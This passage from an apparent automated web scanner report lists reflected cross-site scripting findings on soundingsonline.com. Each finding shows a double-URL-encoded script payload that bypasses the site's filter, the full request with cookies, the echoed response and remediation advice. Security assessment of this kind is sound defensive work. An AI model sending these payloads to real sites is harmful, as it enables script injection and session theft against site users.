The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66f91"><script>alert(1)</script>bd21e5f0da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /boat-shop/used-boat-review?66f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd21e5f0da1=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/boat-shop/used-boat-review?66f91"><script>alert(1)</script>bd21e5f0da1=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1384. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4770b"><script>alert(1)</script>a8ef0412ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /calendar?4770b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8ef0412ef3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/calendar?4770b"><script>alert(1)</script>a8ef0412ef3=1&amp;start=15" title="2">
...[SNIP]...

4.1385. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122a9"><script>alert(1)</script>35521301fb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /career-opportunities?122a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35521301fb8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/career-opportunities?122a9"><script>alert(1)</script>35521301fb8=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1386. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2dda8"><script>alert(1)</script>aa57a1f163c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs?2dda8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa57a1f163c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs?2dda8"><script>alert(1)</script>aa57a1f163c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1387. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8455b"><script>alert(1)</script>46cc250c867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/bay-tripper?8455b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cc250c867=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/bay-tripper?8455b"><script>alert(1)</script>46cc250c867=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1388. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8ec3c"><script>alert(1)</script>0df49a7dd23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/books?8ec3c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0df49a7dd23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/books?8ec3c"><script>alert(1)</script>0df49a7dd23=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1389. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc3b0"><script>alert(1)</script>96642237bfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/new-england-fishing?dc3b0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96642237bfb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/new-england-fishing?dc3b0"><script>alert(1)</script>96642237bfb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1390. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 52975"><script>alert(1)</script>db3c7c9fe1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /columns-blogs/under-way?52975%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3c7c9fe1c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/columns-blogs/under-way?52975"><script>alert(1)</script>db3c7c9fe1c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1391. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5850"><script>alert(1)</script>acf387a70db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contact-us?c5850%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eacf387a70db=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/contact-us?c5850"><script>alert(1)</script>acf387a70db=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1392. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89ad6"><script>alert(1)</script>3cbaba1e44d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features?89ad6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3cbaba1e44d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features?89ad6"><script>alert(1)</script>3cbaba1e44d=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1393. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae44c"><script>alert(1)</script>8d35706e11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/in-depth?ae44c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8d35706e11a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/in-depth?ae44c"><script>alert(1)</script>8d35706e11a=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1394. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 314be"><script>alert(1)</script>162c4d495b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
